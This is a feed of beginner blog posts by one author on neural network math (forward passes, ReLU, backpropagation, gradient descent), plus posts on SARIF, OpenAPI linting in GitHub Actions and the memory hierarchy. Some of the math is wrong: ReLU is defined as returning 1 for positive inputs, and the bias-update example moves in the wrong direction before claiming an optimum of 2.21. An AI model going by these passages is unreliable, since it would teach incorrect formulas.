DEV Community: Ganesh Kumar

Understanding Multiple Input and Output Neural Network

Ganesh Kumar — Tue, 07 Jul 2026 12:28:28 +0000

Hello, I'm Ganesh. I'm building git-lrc, an AI code reviewer that runs on every commit. It is free, unlimited, and source-available on Github. Star git-lrc on GitHub to help more developers discover the project. Do give it a try and share your feedback for improving the product.

In the previous article, we discussed how ReLU activation function works. Now let's see how multiple input and multiple output neural networks work.

How Multiple Input and Output Neural Network works

Until now, we worked with a neural network that had a single input and a single output. In real-world problems, we usually have multiple inputs and multiple outputs.

In this article, we will build a neural network with:

2 inputs (input1 and input2)
1 hidden layer with 2 neurons
3 outputs (output1, output2, output3)
ReLU as the activation function

Network Structure

input1 ──┐
         ├──► hidden_neuron1 ──┬──► output1
input2 ──┤                     ├──► output2
         └──► hidden_neuron2 ──┴──► output3

Each input is connected to each hidden neuron, and each hidden neuron is connected to each output neuron.

Forward Pass Equations

All weights and biases are assigned based on normal distribution.
Hidden Layer Calculation
For hidden neuron 1:

x1 = (input1 * w1) + (input2 * w2) + b1
y1 = ReLU(x1) = max(0, x1)

For hidden neuron 2:

x2 = (input1 * w3) + (input2 * w4) + b2
y2 = ReLU(x2) = max(0, x2)

Output Layer Calculation

For output1:

output1 = (y1 * w5) + (y2 * w6) + b3

For output2:

output2 = (y1 * w7) + (y2 * w8) + b4

For output3:

output3 = (y1 * w9) + (y2 * w10) + b5

Example with Numbers

Let's work through a concrete example.

Given inputs:

input1 = 2
input2 = 3

Assume the following initial weights and biases:

Hidden layer weights:
  w1 = 0.5,  w2 = -0.3,  b1 = 0.1
  w3 = -0.4, w4 = 0.8,   b2 = 0.2

Output layer weights:
  w5 = 0.6,  w6 = 0.7,  b3 = 0.1
  w7 = -0.5, w8 = 0.4,  b4 = 0.2
  w9 = 0.3,  w10 = -0.6, b5 = 0.0

Calculate hidden neuron values

Hidden neuron 1:

x1 = (2 * 0.5) + (3 * -0.3) + 0.1
   = 1.0 - 0.9 + 0.1
   = 0.2

y1 = ReLU(0.2) = max(0, 0.2) = 0.2

Hidden neuron 2:

x2 = (2 * -0.4) + (3 * 0.8) + 0.2
   = -0.8 + 2.4 + 0.2
   = 1.8

y2 = ReLU(1.8) = max(0, 1.8) = 1.8

Calculate outputs

Output 1:

output1 = (0.2 * 0.6) + (1.8 * 0.7) + 0.1
        = 0.12 + 1.26 + 0.1
        = 1.48

Output 2:

output2 = (0.2 * -0.5) + (1.8 * 0.4) + 0.2
        = -0.10 + 0.72 + 0.2
        = 0.82

Output 3:

output3 = (0.2 * 0.3) + (1.8 * -0.6) + 0.0
        = 0.06 - 1.08 + 0.0
        = -1.02

Final Results

output1 = 1.48
output2 = 0.82
output3 = -1.02

Why ReLU works here

Notice that x1 = 0.2 and x2 = 1.8 — both are positive, so ReLU passes them through unchanged.

If any x value were negative (say x1 = -0.5), then:

y1 = ReLU(-0.5) = max(0, -0.5) = 0

That neuron would contribute nothing to the outputs, effectively "turning off" and making the network sparse and efficient.

Matrix Representation

You can think of all the weights as a matrix of connections:

Hidden Layer (2x2 weight matrix + 2 biases):

  w1   w2   b1        w3   w4   b2
[ 0.5  -0.3  0.1 ]  [ -0.4  0.8  0.2 ]


Output Layer (3x2 weight matrix + 3 biases):

  w5   w6   b3
[ 0.6  0.7  0.1 ]   → output1

  w7   w8   b4
[-0.5  0.4  0.2 ]   → output2

  w9  w10   b5
[ 0.3 -0.6  0.0 ]   → output3

Each output neuron learns a different combination of the hidden neuron outputs, allowing the network to produce multiple independent predictions.

Conclusion

We now understand how a neural network with 2 inputs and 3 outputs works step by step using the ReLU activation function:

Each hidden neuron receives all inputs, computes a weighted sum plus bias, and applies ReLU.
Each output neuron receives all hidden neuron outputs and computes its own weighted sum plus bias.
The network can produce multiple distinct outputs simultaneously from the same inputs.

Any feedback or contributors are welcome! It's online, source-available, and ready for anyone to use.

⭐ Star git-lrc on GitHub

Understanding ReLU activation function for Neural Network

Ganesh Kumar — Sun, 05 Jul 2026 17:15:07 +0000

In the previous article, we discussed how backpropagation actually works. We also calculated weight and bias for all the layers.
We used soft plus activation function for our small neural network.

Now in this article let's use ReLU function for the neural network.

Defination of ReLU

It is a function which will return the input if the input is positive otherwise it will return 0.

f(x) = max(0,x)

In normal expression

f(x) = 1 if x > 0
0 if x <=0

Using ReLU in Neural Network

For First Layer we can calculate.

As we use 2 hidden neurons in the first layer we have to calculate for both the neurons separately.

x1 = ( input x weight1 ) + bias1
y1 = ReLu(x1)

Similarly calculating for second hidden neuron.

x2 = ( input x weight2 ) + bias2
y2 = ReLu(x2)

Conclusion

From both equation we can calulate the outputs of first layer and can pass it to the second layer.

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.

⭐ Star git-lrc on GitHub

Understanding Backpropagation: Calculating Gradients for Hidden Layer Weights and Biases

Ganesh Kumar — Tue, 30 Jun 2026 18:51:03 +0000

In the previous article, we derived formulas for updating the output layer weights w3, w4, and bias b3. Now, we will understand how to calculate the gradients for the hidden layer parameters: w1, b1, w2, and b2.

How are w1, b1, w2, and b2 connected to the prediction?

To find the gradients of the parameters in the hidden layer, we need to trace how changing these values affects the final prediction and the error (SSR).

Let's recall the structure of our neural network:

For the top neuron:

x1 = input * w1 + b1

y1 = f(x1) = log(1 + e^x1) (using the softplus function)

For the bottom neuron:

x2 = input * w2 + b2

y2 = f(x2) = log(1 + e^x2) (using the softplus function)

Finally, the prediction:

Predicted = y1 * w3 + y2 * w4 + b3

And the prediction error:

SSR = Σ (observed − predicted)²

Since w1, b1, w2, and b2 are not directly connected to the output prediction, we must use the chain rule to backpropagate the error from the output layer back to the hidden layer.

Applying the Chain Rule to the Hidden Layer

Let's calculate the gradient for the top neuron's weight w1 first.

A change in w1 affects x1, which affects the output y1, which affects the predicted value, which finally affects the SSR.

So, by the chain rule:

dSSR/dw1 = dSSR/d(predicted) * d(predicted)/dy1 * dy1/dx1 * dx1/dw1

Let's calculate each of these values:

1. dSSR/d(predicted)

As we saw in the previous articles, this is the derivative of SSR with respect to the predicted value:

dSSR/d(predicted) = -2 * (Observed - Predicted)

2. d(predicted)/dy1

Since Predicted = y1 * w3 + y2 * w4 + b3, and all other terms are treated as constants w.r.t y1:

d(predicted)/dy1 = w3

3. dy1/dx1

Since y1 = log(1 + e^x1), the derivative of the softplus function is the logistic sigmoid function:

dy1/dx1 = e^x1 / (1 + e^x1)

4. dx1/dw1

Since x1 = input * w1 + b1, differentiating w.r.t w1 gives:

dx1/dw1 = input

Final formula for dSSR/dw1:

Multiplying these parts together, we get:

dSSR/dw1 = -2 * (Observed - Predicted) * w3 * (e^x1 / (1 + e^x1)) * input

Deriving the Gradient for Bias b1

Similarly, for the top neuron's bias b1:

dSSR/db1 = dSSR/d(predicted) * d(predicted)/dy1 * dy1/dx1 * dx1/db1

The only term that changes here is the last one:

dx1/db1 = 1 (since x1 = input * w1 + b1, derivative w.r.t b1 is 1)

So:

dSSR/db1 = -2 * (Observed - Predicted) * w3 * (e^x1 / (1 + e^x1)) * 1

Deriving the Gradients for the Bottom Neuron (w2 and b2)

Following the same logic, we can find the gradients for the bottom neuron's parameters:

For weight w2:

dSSR/dw2 = dSSR/d(predicted) * d(predicted)/dy2 * dy2/dx2 * dx2/dw2

dSSR/dw2 = -2 * (Observed - Predicted) * w4 * (e^x2 / (1 + e^x2)) * input

For bias b2:

dSSR/db2 = dSSR/d(predicted) * d(predicted)/dy2 * dy2/dx2 * dx2/db2

dSSR/db2 = -2 * (Observed - Predicted) * w4 * (e^x2 / (1 + e^x2)) * 1

Improving Prediction with self Learning

Once we calculate all these derivatives (dSSR/dw1, dSSR/db1, dSSR/dw2, dSSR/db2), we can update the hidden layer weights and biases using gradient descent:

Step size w1 = derivation w1 * Learning rate
New w1 = old w1 - Step size w1

Step size b1 = derivation b1 * Learning rate
New b1 = old b1 - Step size b1

Step size w2 = derivation w2 * Learning rate
New w2 = old w2 - Step size w2

Step size b2 = derivation b2 * Learning rate
New b2 = old b2 - Step size b2

By doing this repeatedly, the model minimizes the error and converges to the optimal values for all weights and biases.

Conclusion

We have successfully derived the formulas to calculate the gradients for w1, b1, w2, and b2. Combined with the output layer derivations, we now have the math for the entire neural network's backpropagation!

In the next article, we will see how to implement this in code.

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.

⭐ Star git-lrc on GitHub

Understanding Backpropagation: Chain Rule, SSR Gradients, and Weight Updates in Neural Networks

Ganesh Kumar — Tue, 23 Jun 2026 04:02:53 +0000

In the previous article, We derived fromula for pridicting b3 now we will understand how to dereive wieghts w3 and w4.

How wights are connected to previous output layer?

In previous direvation we considered b3 as variable and w3 and w4 as constants.

That means we need have w3 and w4 as a variable to find it's value.

Wieghts w3 and w4 are multiplied to activation function of both top and bottom neurons.

So, Actication function of top neuron is 1

As it is soft plus function

x1 = input x w1 + b1

y1=f(x1)= log(1+e^x)

Similarly for bottom neuron

x2 = input x w2 + b2

y2=f(x2)= log(1+e^x)

So, Finaly we get

Predicted = y1 * w3 + y2 * w4 + b3

So, finaly we get

SSR = Σ (observed − predicted)²

How Each Values are Calculated?

Now By applying to previous formula by applying direvation w.r.t w3, w4 and b3.

dSSR/dw3 = dSSR/d(predicted) * d(predicted)/dw3

dSSR/dw4 = dSSR/d(predicted) * d(predicted)/dw4

dSSR/db3 = dSSR/d(predicted) * d(predicted)/db3

We can see dSSR/d(predicted) is common in all three direvation.

dSSR/d(predicted) = 2 * (Predicted - Observed) * -1

Now, for d(predicted)/dw3

d(predicted)/dw3 = d(y1 * w3 + y2 * w4 + b3)/dw3 = y1

As remaining all are constant w.r.t w3.

similarly for d(predicted)/dw4

d(predicted)/dw4 = d(y1 * w3 + y2 * w4 + b3)/dw4 = y2

As remaining all are constant w.r.t w4.

Now, for d(predicted)/db3

d(predicted)/db3 = d(y1 * w3 + y2 * w4 + b3)/db3 = 1

As remaining all are constant w.r.t b3.

Now Finaly we get

dSSR/dw3 = dSSR/d(predicted) * d(predicted)/dw3 = 2 * (Predicted - Observed) * -1 * y1 = -2 * (Predicted - Observed) * y1

dSSR/dw4 = dSSR/d(predicted) * d(predicted)/dw4 = 2 * (Predicted - Observed) * -1 * y2 = -2 * (Predicted - Observed) * y2

dSSR/db3 = dSSR/d(predicted) * d(predicted)/db3 = 2 * (Predicted - Observed) * -1 * 1 = -2 * (Predicted - Observed)

Improving Prediction with self Learning

Now we calculate dSSR/dw3, dSSR/dw4, and dSSR/db3.

Then we try to make the value near to 0 hence making the error minimum.

Step size = derivation * Learning rate

New w3 = old w3 - Step size w3

Do the same thing for w4 and b3

Conclusion

We got an idea how weights are calculated for a single neuron. Now we can extend this idea to multi layers.

In next article we will see how to calculate weights for multi layers.

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.

⭐ Star git-lrc on GitHub

How to calculate weights using gradient descent

Ganesh Kumar — Fri, 19 Jun 2026 11:29:00 +0000

In the previous article, I explained the requirements for finding the weights of the last layer. Now let's see how we actually assign and optimize those weights using gradient descent.

Selecting Random Weights From a Normal Distribution

First, we assign random numbers (drawn from a normal distribution) to the weights w3 and w4.

Then we sum up both results along with the bias b3 = 0:

predicted = (output of top neuron × w3) + (output of bottom neuron × w4) + b3

This gives us our initial prediction, and we can plot the final graph:

With these initial random weights, the SSR (Sum of Squared Residuals) is calculated again to measure how far off our predictions are.

Gradient Descent Algorithm For Optimal Values

Now we need to find the derivative of SSR with respect to b3 so we can update it.

Recall our loss function:

SSR = Σ (observed − predicted)²

And our predicted value is:

predicted = (output of top neuron × w3) + (output of bottom neuron × w4) + b3

This is the same chain rule approach we used for backpropagation when optimizing only b3.

The key insight here is that the products of w3 and w4 with their respective neuron outputs are treated as constants for a single gradient calculation with respect to b3. Since only b3 is the variable in this expression, the derivative simplifies cleanly — just as we saw in the previous articles.

Conclusion

By assigning random weights from a normal distribution and then applying gradient descent with the chain rule, we can iteratively optimize each weight and bias in the network. The same process that worked for b3 alone now extends to w3 and w4 — we just need to carefully apply the chain rule at each step to compute the correct gradients.

Any feedback or contributors are welcome! It's online, source-available, and ready for anyone to use.

⭐ Star git-lrc on GitHub

Understanding Idea behind Full Backpropogation

Ganesh Kumar — Wed, 17 Jun 2026 12:59:48 +0000

In the previous article, we learned how to calculate the gradient of the last bias in a neural network.

Now we will explore how gradients flow through the entire network and how to calculate the weights of previous layers.

How to calculate weights

Now we will calculate weights of the previous layer

The challenge is that the loss function does not directly depend on these earlier weights.

For example, consider a weight (w1 and w2 are already calculated ) in a hidden layer.

Changing (w3 and w4):

Changes the hidden neuron output.
Changes the output neuron input.
Changes the final prediction.
Changes the loss.

So there is an indirect relationship between the weight and the loss.

This is exactly why we need the chain rule.

Conclusion

Similar to previous calculation we should also calculate for all weights and biases using chain rule and gradient descent.

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.

⭐ Star git-lrc on GitHub

Why Do Neural Networks Need the Chain Rule? How do we apply it?

Ganesh Kumar — Sat, 13 Jun 2026 03:26:39 +0000

In the previous article, we introduced backpropagation and learned that neural networks improve by reducing prediction errors.

We also saw that backpropagation relies on two fundamental ideas:

The Chain Rule
Gradient Descent

But we haven't yet answered an important question:

How does we calculate wieghts and biases to decrease the error?

To answer that, let's look at a very small neural network.

A Simple Neural Network

Imagine a neural network with:
Similar to the previous example.

One input neuron
Two hidden neurons
One output neuron

Calculating Last Bias In the last layer

Let's asssume we have wieght and bias of all hidden layer and we only want to find last bias b3

Now from gradient descent, we can update the last bias b3 using the partial derivative of loss with respect to b3

The Error rate is done with Residuals.
Residual = Observed - Predicted

SSR = Sum of (Observed - Predicted)^2

So, We take 3 samples for training

Starting, Ending and middle values.

Finaly By calculating SSR.

Use of Chain Rule

We actually calculated b3 only using gradient descent.

Now Using chain Value generated from the weight and bias of previous layers

Predicted = Top Layer + Bottom Layer + Bias (b3)

Using Chain Rule we can write Dirivative of SSR with

dssr/db3 = dssr/dpredicted * dpredicted/db3

dssr/dpredicted = (Observed - Predicted)^2

As predicted, it is not constant and we are dirving it.

dssr/dpredicted = 2*(Observed - Predicted)*(d(Observed - Predicted))/dpredicted)

dssr/dpredicted = 2*(Observed - Predicted)(-1)
dssr/dpredicted = -2(Observed - Predicted)

For dpredicted/db3

dpredicted = Top Layer + Bottom Layer + Bias (b3)
Both Top Layer and Bottom Layer is constant for this calculation
dpredicted/db3 = 1

Finaly dssr/db3 = -2*(Observed - Predicted) * 1

Slop Calculation and Learning

Now we have 3 values of predicted for 3 samples

dssr/db3 = Σ(-2*(Observed-Predicted))

dssr/db3 = -2 * [(Observed1 - Predicted1) * 1 + (Observed2 - Predicted2) * 1 + (Observed3 - Predicted3) * 1]

dssr/db3 = -2 * [(Residual1) + (Residual2) + (Residual3)]

dssr/db3 = -2 * (ResidualSum)

For our training data I got slope = -15.7

step size = slope x learning rate

step size = -15.7 x 0.1 = -1.57

new b3 = old b3 + step size

new b3 = 0 + (-1.57) = -1.57

Then again, recalculating SSR with new b3 we got slop.

slop = -6.26

step size = -6.26 x 0.1 = -0.626

new b3 = -1.57 + (-0.626) = -2.196

Similarly after calculatinng multiple times utile we get step size close to 0.

Final Result
We found the optimal
b3 = 2.21

Conclusion

We could able to apply these chain rule, gradient descent and backpropagation in a very small neural network.

In next article we will discuss how to calculate wieghts and biases in same neural network.

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.

⭐ Star git-lrc on GitHub

Running OpenAPI Validation in GitHub Actions and Showing Findings in Pull Requests

Ganesh Kumar — Wed, 10 Jun 2026 20:39:09 +0000

In a previous article, I explained what SARIF is and why many security and quality tools use it as a common reporting format.

In this article, we'll focus on a practical example: validating an OpenAPI specification in GitHub Actions and displaying findings directly inside GitHub Pull Requests.

By the end, you'll have a workflow that:

Lints your OpenAPI specification
Generates a SARIF report
Uploads results to GitHub Code Scanning
Shows annotations directly in Pull Requests

Sample OpenAPI Specification

Let's start with a simple OpenAPI file that contains a deliberate issue.

openapi: 3.0.3

info:
  title: User API
  version: 1.0.0

paths:
  /users/{id}:
    get:
      operationId: getUserById

      parameters:
        - name: userId
          in: path
          required: true
          schema:
            type: string

      responses:
        "200":
          description: User found

Notice that the path is:

/users/{id}

but the parameter is named:

userId

The parameter name should match the path placeholder (id).

We'll use this mistake to verify that our workflow correctly reports findings.

Installing Spectral

For this example, we'll use Spectral, one of the most popular OpenAPI linting tools.

npm install -g @stoplight/spectral-cli

Run it locally:

spectral lint openapi.yaml

You should see an error related to the path parameter mismatch.

Generating a SARIF Report

Instead of printing results to the console, we can generate a SARIF report:

spectral lint openapi.yaml \
  --format sarif \
  --output results.sarif

This produces:

results.sarif

which GitHub can consume directly.

GitHub Actions Workflow

Create:

.github/workflows/openapi.yml

name: OpenAPI Validation

on:
  pull_request:

permissions:
  contents: read
  security-events: write

jobs:
  openapi:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - uses: actions/setup-node@v4
        with:
          node-version: 20

      - name: Install Spectral
        run: npm install -g @stoplight/spectral-cli

      - name: Generate SARIF Report
        run: |
          spectral lint openapi.yaml \
            --format sarif \
            --output results.sarif

      - name: Upload SARIF
        uses: github/codeql-action/upload-sarif@v3
        with:
          sarif_file: results.sarif

How It Works

The workflow performs four simple steps:

Checks out the repository
Installs Spectral
Generates a SARIF report
Uploads the SARIF report to GitHub

The upload step is handled by GitHub's official SARIF uploader:

- uses: github/codeql-action/upload-sarif@v3
  with:
    sarif_file: results.sarif

Once uploaded, GitHub automatically processes the findings.

Viewing Results in Pull Requests

After opening a Pull Request, GitHub analyzes the uploaded SARIF report and associates findings with the corresponding files and lines.

For our example, GitHub highlights the parameter definition and reports something similar to:

Path parameter "id" is not defined.
Expected parameter name "id" but found "userId".

Developers can review the issue directly from the Pull Request without searching through GitHub Action logs.

Why I Prefer This Approach

Many teams fail OpenAPI validation jobs and require developers to inspect CI logs.

While this works, it doesn't scale well when repositories contain multiple specifications or many validation rules.

Uploading SARIF results provides:

Inline annotations
Better visibility during code review
Centralized findings in GitHub Code Scanning
Consistent reporting across different tools

The same workflow can later be extended to include security scanners, secret scanners, IaC scanners, and custom validation tools.

Conclusion

Integrating OpenAPI validation into GitHub Actions is straightforward. With Spectral generating SARIF output and GitHub handling the presentation layer, developers receive feedback exactly where they are already reviewing code: inside the Pull Request.

If your organization already uses SARIF for other security or quality tools, OpenAPI validation can fit naturally into the same workflow with only a few lines of configuration.

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.

⭐ Star git-lrc on GitHub

What Is SARIF and How Does It Help Security Tools Work Together?

Ganesh Kumar — Mon, 08 Jun 2026 20:28:21 +0000

If you've ever worked with tools like Semgrep, Trivy, Checkov, Gitleaks, or CodeQL, you've probably noticed that each tool produces results in a different format. Some output JSON, some use XML, while others generate plain text reports.

This creates a problem: how do you aggregate multiple tools results from multiple tools into a single platform?

That's where SARIF comes in.

What is SARIF?

SARIF stands for Static Analysis Results Interchange Format.

It is an open standard designed to represent findings from static analysis tools, security scanners, linters, and code quality tools in a common format.

Think of SARIF as a universal translator.

Instead of every tool speaking its own language:

Semgrep -> Semgrep JSON
Trivy -> Trivy JSON
Checkov -> Checkov JSON
Gitleaks -> Gitleaks JSON

SARIF allows all of them to communicate using a shared structure:

Semgrep
Trivy
Checkov
Gitleaks
    ↓
   SARIF

Why Was SARIF Created?

Imagine a company running 20 different scanners in its CI/CD pipeline.

Each scanner reports:

Different severity levels
Different file formats
Different metadata
Different output structures
Different CVE
Different CVSS scores

Building integrations for every tool becomes difficult and expensive.

SARIF solves this problem by providing a standardized schema for:

Rule IDs
Messages
Severity
File locations
Code snippets
Security metadata
Fix suggestions

This allows platforms to consume results from many tools without writing custom integrations for each one.

A Simple Example

Suppose a security scanner finds a vulnerability:

File: app.py
Line: 42
Severity: High
Message: Possible SQL Injection

In SARIF, that information becomes structured JSON that any compatible platform can understand.

The scanner changes, but the format remains the same.

How SARIF Helps Developers

One Format for Many Tools

Instead of handling dozens of output formats:

Tool A -> Format A
Tool B -> Format B
Tool C -> Format C

you can standardize on:

Tool A
Tool B
Tool C
   ↓
 SARIF

Better Tool Interoperability

A SARIF file generated by one tool can be consumed by another platform without modification.

This makes integrations significantly easier.

GitHub Code Scanning Support

One of the biggest reasons SARIF became popular is GitHub Code Scanning.

GitHub accepts SARIF uploads and automatically displays:

Security findings
Code quality issues
Vulnerabilities
File-level annotations

directly inside pull requests and repositories.

Easier Aggregation

Organizations often run multiple scanners:

Semgrep
Trivy
Checkov
Gitleaks
Bandit

SARIF makes it possible to combine all findings into a single report.

Conclusion

SARIF is a common language that allows tools to exchange findings in a standard way.

As the number of security and code analysis tools continues to grow, standards like SARIF help reduce integration complexity and make tool ecosystems work together more effectively.

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.

⭐ Star git-lrc on GitHub

Understanding Backpropagation: How Neural Networks Learn from Their Mistakes

Ganesh Kumar — Sat, 06 Jun 2026 19:46:43 +0000

From Linear Regression to Gradient Descent

In previous parts we discussed about linear regression, gradient descent and how to calculate the optimal slope and intercept using Gradient Descent.

In this article, we'll build an intuition for backpropagation, understand why it is necessary, and explore how the chain rule and gradient descent work together to enable neural network learning.

What is Backpropagation?

Backpropagation is an algorithm used to train neural networks.

It is a way to adjust the weights and biases of a neural network to reduce the error between the predicted output and the actual output.

In simple terms, it is a way for the neural network to learn from its mistakes.

This learning process is powered by an algorithm called backpropagation, one of the most important concepts in machine learning. Backpropagation provides a systematic way for a neural network to determine which internal parameters contributed to an error and how those parameters should be updated to reduce future mistakes.

Imagine teaching a student to solve math problems.

After each attempt, you compare the student's answer with the correct one, identify where mistakes occurred, and provide feedback. Over time, the student adjusts their approach and improves. Backpropagation works in a similar way: the network makes a prediction, calculates the error, traces that error backward through the network, and updates its parameters accordingly.

At its core, backpropagation combines two fundamental mathematical ideas:

The Chain Rule from calculus, which helps determine how changes in one part of the network affect the final error.
Gradient Descent, an optimization technique that uses those calculations to update the network's parameters in the direction that reduces error.

By repeatedly answering these questions across thousands or millions of training examples, neural networks gradually learn patterns hidden within data and become increasingly accurate.

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.

⭐ Star git-lrc on GitHub

Why can't we just use one storage technology for everything?

Ganesh Kumar — Thu, 04 Jun 2026 19:41:14 +0000

Modern computers use multiple storage and memory technologies because no single medium can simultaneously provide massive capacity, ultra-low latency, high bandwidth, and low cost.

Every level of the memory hierarchy represents a tradeoff between these characteristics.

Why is there a memory hierarchy?

This is because each storage technology has its own advantages and disadvantages. We can't use one storage technology for all the purposes.

The main characteristics to consider are:

Capacity
Latency
Bandwidth
Cost

Each Storage technology is optimized for a specific purpose.

For example:
Imagine you have to travel from one place to another.
You can go with walking, bicycle, car, train, or plane.

Each mode of transport has its own advantages and disadvantages.

Another better example is think of using LLM model.

Depending on task complexity and size of data we can choose the model.

If we mess up with choosing model we will not get the desired output wheather cost will rise, or response will be very low quality.

Memory Hierarchy

Now I have listed down the memory hierarchy From top to bottom.

CPU Registers

This is the fastest storage available inside a processor.

Role:
Stores values currently being operated on by the CPU.

Characteristic	Value
Capacity	Extremely small (typically 32 × 64-bit registers per core)
Latency	~0.3 ns (about one CPU cycle)
Bandwidth	Highest in the system
Cost	Highest cost per bit (16 transistors per bit)

CPU Cache (L1, L2, L3)

A small, ultra-fast memory layer designed to keep frequently used data close to the processor.

Role: Reduces the need to access slower main memory.

Characteristic	Value
Capacity	Small (tens of MB total)
Latency	~7.5 ns (L3 cache)
Bandwidth	Extremely high
Cost	Very expensive (SRAM, 6 transistors per bit)

DRAM (Main Memory)

The working memory used by applications and operating systems.

Role: Holds active programs and data currently being used.

Characteristic	Value
Capacity	Typically 32 GB
Latency	~45 ns
Bandwidth	~48 GB/s
Cost	Higher than storage drives

GPU VRAM

Memory optimized for throughput rather than low latency.
Role: Feeds large amounts of data to thousands of GPU cores simultaneously.

Characteristic	Value
Capacity	~24 GB
Latency	~250 ns
Bandwidth	Extremely high
Cost	Expensive

NVMe SSD

High-speed solid-state storage connected through PCIe.
Role: Fast persistent storage for operating systems, applications, and files.

Characteristic	Value
Capacity	~2 TB
Read Latency	~80 μs
Write Latency	~500 μs
Bandwidth	~5 GB/s
Cost	~7 cents per GB

SATA SSD

An older solid-state storage technology using the SATA interface.

Role: Affordable solid-state storage with lower performance than NVMe.

Characteristic	Value
Capacity	Up to ~4 TB
Latency	~120 μs
Bandwidth	Lower than NVMe
Cost	Similar to NVMe SSDs

Hard Disk Drive (HDD)

Mechanical storage using spinning magnetic platters.
Role: Lowest-cost local storage for large datasets and archives.

Characteristic	Value
Capacity	~8 TB
Latency	~8.3–10 ms
Bandwidth	Very low compared to SSDs
Cost	~1–2 cents per GB

The Fundamental Tradeoff

As we move down the memory hierarchy:

Capacity increases.
Cost per GB decreases.
Latency increases.
Access speed decreases.
Distance from the processor increases.

By leveraging this trade-off, modern computers use a hierarchy of registers, cache, memory, SSDs, HDDs, and cloud storage instead of relying on a single storage technology.

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.

⭐ Star git-lrc on GitHub

Credits

Here are the sources that inspired me to write an article on this topic.

Why Don’t Computers Just Use One Type of Memory?

From Linear Regression to Gradient Descent

Ganesh Kumar — Thu, 04 Jun 2026 06:14:59 +0000

In the previous section, we learned that linear regression finds the best-fitting line by determining the optimal slope and intercept.

In this article, we will discuss how to calculate the optimal slope and intercept using Gradient Descent.

How to calculate the optimal slope and intercept using Gradient Descent

The quality of that line is measured using the Sum of Squared Residuals (SSR), which represents the total prediction error.

SSR = sum( (y_observed - y_predicted)^2 )

The best regression line is simply the line that produces the smallest SSR.

When studying linear regression, it's easy to think that the slope and intercept magically appear from a formula. In reality, they are the values that minimize the prediction error. This is where Gradient Descent comes in.

Instead of calculating the optimal slope and intercept directly using a closed-form equation, Gradient Descent starts with arbitrary values and gradually improves them. After each step, it measures how the SSR changes and adjusts the parameters in the direction that reduces the error.

Step-by-Step Gradient Descent Example

Let's illustrate how Gradient Descent works using the exact same dataset of 4 points from Part 10:

1. The Dataset

Point 1: (1, 2)
Point 2: (2, 3)
Point 3: (3, 5)
Point 4: (4, 4)

2. Simplifying the Problem

To make the math easy to trace, we will hold the Slope (m) constant at its optimal value of 0.8 and focus purely on finding the optimal Intercept (b).

Our prediction equation is:

y_predicted = 0.8 * x + b

We start with an initial guess for the intercept: b = 0.

3. Calculating the Initial SSR (at b = 0)

Let's find the predicted values and calculate the residuals (observed - predicted):

For Point 1 (1, 2):
- y_predicted = 0.8 * 1 + 0 = 0.8
- Residual_1 = 2 - 0.8 = 1.2
For Point 2 (2, 3):
- y_predicted = 0.8 * 2 + 0 = 1.6
- Residual_2 = 3 - 1.6 = 1.4
For Point 3 (3, 5):
- y_predicted = 0.8 * 3 + 0 = 2.4
- Residual_3 = 5 - 2.4 = 2.6
For Point 4 (4, 4):
- y_predicted = 0.8 * 4 + 0 = 3.2
- Residual_4 = 4 - 3.2 = 0.8

Now, sum the squared residuals:

SSR = 1.2^2 + 1.4^2 + 2.6^2 + 0.8^2
    = 1.44 + 1.96 + 6.76 + 0.64
    = 10.8

4. Derivation of the Gradient (d(SSR)/db)

To know which direction to move the intercept b and by how much, we take the derivative of SSR with respect to b:

SSR = sum( (y_observed - (0.8 * x_observed + b))^2 )

Applying the chain rule:

d(SSR)/db = sum( 2 * (y_observed - (0.8 * x_observed + b)) * (-1) )
          = -2 * sum( y_observed - y_predicted )
          = -2 * sum( Residuals )

The gradient is simply -2 times the sum of the residuals.

5. Updating the Intercept

The update rule is:

b_new = b_old - (Learning Rate * Gradient)

Let's choose a Learning Rate (LR) of 0.1.

Step 1:
- Gradient: d(SSR)/db = -2 * (1.2 + 1.4 + 2.6 + 0.8) = -2 * 6.0 = -12.0
- Step Size: Gradient * LR = -12.0 * 0.1 = -1.2
- New Intercept: b_new = 0 - (-1.2) = 1.2
Step 2:
- With b = 1.2, the predictions are closer to the actual values.
- The new residuals are: 0.0, 0.2, 1.4, and -0.4.
- SSR: 0.0^2 + 0.2^2 + 1.4^2 + (-0.4)^2 = 2.16
- Gradient: -2 * (0.0 + 0.2 + 1.4 - 0.4) = -2.4
- Step Size: -2.4 * 0.1 = -0.24
- New Intercept: b_new = 1.2 - (-0.24) = 1.44
Step 3 (Convergence):
- With b = 1.44, the new residuals are: -0.24, -0.04, 1.16, and -0.64.
- Gradient: -2 * (-0.24 - 0.04 + 1.16 - 0.64) = -0.48
- Step Size: -0.48 * 0.1 = -0.048
- New Intercept: b_new = 1.44 - (-0.048) = 1.488
- We repeat this loop. As we approach the optimal intercept, the residuals sum up closer to 0, which shrinks the gradient and steps.
- After several iterations, the gradient becomes 0, and the intercept converges to the exact optimal value of 1.5 (where SSR reaches its minimum value of 1.8).

Conclusion

We started with an arbitrary intercept of 0 and adjusted it step-by-step. Each step was guided by the gradient, which told us exactly how much to change the intercept to reduce the prediction error (SSR). We repeated this process until the error reached its minimum.

While this example focused on a simple linear regression with a single variable, this same principle applies to deep neural networks with millions of parameters. Gradient descent is the engine that drives learning in machine learning.

Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.

⭐ Star git-lrc on GitHub